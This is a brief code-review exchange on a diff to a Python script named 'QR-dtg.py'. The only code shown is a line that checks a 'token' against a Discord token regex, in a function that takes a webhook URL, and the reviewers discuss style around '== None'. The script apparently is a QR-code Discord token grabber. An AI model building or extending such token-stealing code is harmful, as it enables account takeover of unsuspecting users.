QR-dtg.py

```diff
@@ -101,10 +95,24 @@ def main(webhook_url) -> None:
 
 {Fore.LIGHTYELLOW_EX}Enter anything to exit\n>>> {Fore.LIGHTWHITE_EX}""", 
 end="")
+
+            if re.search("[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", token) == None:
```

Comment:
Maybe change this to `if not re.search("[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", token):`?

Reply:
Does the same thing, re.search returns None if there is no match, but thats up to u :)

Reply:
yeah I know that it does the same thing, it's just to improve readability :)

Reply:
also as a rule of thumb, it's better to use "something is None" than "something == None"